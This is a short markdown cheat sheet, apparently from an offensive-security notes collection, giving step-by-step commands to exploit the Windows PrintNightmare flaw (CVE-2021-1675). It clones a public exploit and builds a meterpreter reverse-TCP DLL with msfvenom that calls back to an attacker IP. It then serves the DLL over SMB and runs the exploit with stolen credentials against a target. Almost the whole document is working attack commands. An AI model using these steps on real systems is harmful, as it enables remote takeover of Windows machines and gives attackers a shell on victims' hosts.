killchain-compendium/Exploits/Windows/PrintNightmare.md

# Print Nightmare

* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)

* Create virtual env inside cloned repo and install impacket
```sh
pip install .
pip2 install .
```

* Create payload
```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
```

* Prepare msf multi handler

* Inside virtualenv
```sh
smbserver share $(pwd) -smb2support
```

* Roll the exploit
```sh
python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
```